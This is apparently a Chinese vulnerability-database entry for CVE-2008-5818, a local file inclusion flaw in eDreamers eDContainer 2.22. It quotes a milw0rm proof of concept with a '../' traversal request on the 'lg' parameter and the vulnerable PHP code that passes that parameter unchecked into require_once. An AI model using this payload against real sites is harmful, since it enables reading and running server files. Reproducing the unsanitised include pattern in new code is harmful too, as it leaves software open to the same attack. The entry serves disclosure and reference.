https://www.exploit-db.com/exploits/7604
https://cxsecurity.com/issue/WLB-2009010010
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-013
eDreamers eDContainer 脚本index.php 目录遍历漏洞
| 漏洞ID | 1117167 | 漏洞类型 | 路径遍历 |
| 发布时间 | 2008-12-29 | 更新时间 | 2009-01-29 |
 CVE编号
|
CVE-2008-5818 |  CNNVD-ID
|
CNNVD-200901-013 |
| 漏洞平台 | PHP | CVSS评分 | 6.8 |
|漏洞来源
|漏洞详情
eDreamerseDContainer2.22版本中的index.php存在目录遍历漏洞。当magic_quotes_gpc被中止时,远程攻击者可以借助语言参数中的"..",包含和运行任意的本地文件。
|漏洞EXP
_____ ____ __ __ _ ____ ____ ____
|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___|
| | | |_) | \ V / / _ \ | | _ | | | |
| | | _ < | | / ___ \ | |_| | _ | |___ | |___
|_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____|
eDContainer v2.22 (lg) Local File Inclusion Vulnerability
Script : http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/e/ed/edscontacts/eDContainer_v222.zip
Poc : /index.php?lg=../../../../index
Vuln Code :
File index.php
if ( isset($_REQUEST['lg']) ) { $INDEX['currentLanguage'] = $_REQUEST['lg']; } else if ( !isset( $INDEX['currentLanguage'] ) ) {
$INDEX['currentLanguage'] = $CONFIG['language']['default'];
}
require_once 'myContents_'.$INDEX['currentLanguage'].'.php';
____ _ _ __ __
/ ___| ___ | | __| | | \/ |
| | _ / _ \ | | / _` | | |\/| |
| |_| | | (_) | | |___ | (_| | | | | |
\____| \___/ |_____| \__,_| _____ |_| |_|
|_____|
# milw0rm.com [2008-12-29]|参考资料
来源:XF
名称:edcontainer-index-file-include(47609)
链接:http://xforce.iss.net/xforce/xfdb/47609
来源:BID
名称:33026
链接:http://www.securityfocus.com/bid/33026
来源:MILW0RM
名称:7604
链接:http://www.milw0rm.com/exploits/7604
来源:SREASON
名称:4861
链接:http://securityreason.com/securityalert/4861
来源:SECUNIA
名称:33335
链接:http://secunia.com/advisories/33335
检索漏洞
开始时间
结束时间